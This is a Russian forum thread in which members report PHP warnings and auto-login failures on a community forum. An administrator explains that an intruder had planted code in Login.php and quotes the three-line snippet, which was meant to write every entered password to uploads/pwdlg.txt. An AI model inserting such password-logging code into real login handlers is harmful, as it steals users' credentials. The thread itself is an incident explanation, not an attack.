Перейти к содержанию

Рекомендуемые сообщения

Опубликовано

Когда логинюсь на форум вылезает сверху.

Warning: fopen() expects at least 2 parameters, 1 given in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 394

Warning: fputs(): supplied argument is not a valid stream resource in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 395

Warning: fclose(): supplied argument is not a valid stream resource in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 396

Опубликовано

Ничего не понял. У меня стандартный ИЕ и автологин работать перестал. Что сделать можно, кроме как убить себя? )

Опубликовано

Демент, автологин отвалился у нас с Тони дней пять назад, наверное. Через раз срабатывает.

"Кто видел войну не из штабов, а с поля боя, кто сам был малой частью этих нацеленных стрел и стрелочек, которые так красиво вычерчивают на картах, для того война совсем другая."

(с) Григорий Бакланов, "Высота духа"

kzvezda_for.jpgzazaslugi_for.jpg

Опубликовано

Не знаю как там нашёт багов, лагов но у меня всё пашит отлично.

Опубликовано

Аналогично, И.Е никаких проблемм.

1. "Военное дело просто и вполне доступно здравому уму человека. Но воевать сложно".

Карл фон Клаузевиц

2. НЕНАВИЖУ ФОКИ!!!

kzvezda_for.jpgkzvezda_for.jpgzazaslugi_for.jpg10years_for.jpg

Опубликовано

Зайти на форум. Залогиниться. Нажать "Удалить все куки" и попробовать заново залогиниться.

Подпись сюда надо новую придумать бы.

---

kznameni_for.jpgzaotvagu_for.jpgzazaslugi_for.jpg10years_for.jpg

Опубликовано

Зайти на форум. Залогиниться. Нажать "Удалить все куки" и попробовать заново залогиниться.

Не помогает. IE 6.0.2900

Кроме того, форум не запоминает, какие сообщения я уже прочитал. ПРиходится жать каждый раз "Отметить все сообщения как прочитанные"

До переустановки системы все работало отлично. Привык, пААнимаешь к хорошему.

Опубликовано

Когда логинюсь на форум вылезает сверху.

Warning: fopen() expects at least 2 parameters, 1 given in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 394

Warning: fputs(): supplied argument is not a valid stream resource in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 395

Warning: fclose(): supplied argument is not a valid stream resource in /home/webadmin/72ag.ru/html/ibb/sources/Login.php on line 396

Поламать нас кто-то хотел, по этим строчкам с ошибками такой код появился (в дистрибутивном файле его нету):

$loggs = fopen("uploads/pwdlg.txt");

fputs($loggs,$ibforums->input['PassWord']."\n");

fclose($loggs);

который должен был скидывать наши пароли в файл uploads/pwdlg.txt

Но к счастью тот код для другой версии php и у нас просто не заработал ;)

Опубликовано

Вот вдруг неожиданно сегодня произошел авто логин. Ничего не делал для этого!!!!

Может и прочитанные сообщения помнить будет как раньше? ;)

Опубликовано

Извините,у меня всё работает просто отлично,если загружается.Стоит ;) " Мозила"...

эРэС убивает Б-17,а "месса"-разрывает на куски!

Опубликовано

Когда был общий глюкинштейн-не грузилось и у меня...

эРэС убивает Б-17,а "месса"-разрывает на куски!

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
  • Создать...